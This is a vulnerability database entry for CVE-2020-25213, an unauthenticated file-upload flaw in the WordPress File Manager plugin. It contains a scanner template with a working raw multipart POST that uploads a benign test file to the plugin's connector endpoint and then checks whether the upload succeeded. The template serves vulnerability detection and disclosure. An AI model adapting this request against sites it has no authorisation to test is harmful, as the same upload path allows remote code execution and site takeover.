CVE-2020-25213: WordPress File Manager Plugin - Remote Code Execution

日期: 2025-08-01 | 影响软件: WordPress File Manager Plugin | POC: 已公开

漏洞描述

The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

PoC代码[已公开]

id: CVE-2020-25213

# Uploaded file will be accessible at:-
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
  name: WordPress File Manager Plugin - Remote Code Execution
  author: foulenzer
  severity: critical
  description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected WordPress site.
  remediation: |
    Update to the latest version of the WordPress File Manager Plugin to mitigate this vulnerability.
  reference:
    - https://plugins.trac.wordpress.org/changeset/2373068
    - https://github.com/w4fz5uck5/wp-file-manager-0day
    - https://nvd.nist.gov/vuln/detail/CVE-2020-25213
    - http://packetstormsecurity.com/files/160003/WordPress-File-Manager-6.8-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/171650/WordPress-File-Manager-6.9-Shell-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-25213
    cwe-id: CWE-434
    epss-score: 0.94401
    epss-percentile: 0.99972
    cpe: cpe:2.3:a:webdesi9:file_manager:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: webdesi9
    product: file_manager
    framework: wordpress
  tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive,packetstorm,webdesi9

http:
  - raw:
      - |
        POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48

        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="reqid"

        17457a1fe6959
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="cmd"

        upload
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="target"

        l1_Lw
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="mtime[]"

        1576045135
        --------------------------ca81ac1fececda48
        Content-Disposition: form-data; name="upload[]"; filename="poc.txt"
        Content-Type: text/plain

        poc-test
        --------------------------ca81ac1fececda48--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - poc.txt
          - added
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207a138bb870f9f323c0f1bae37df53038cc902ab7d220cd489c50fec14afd0e3802210095461c29368dc66524cc5dff4ab545c996cef6475bace2c1dc1a5b04e7e29350:922c64590222798bb761d5b6d8e72950

相关漏洞推荐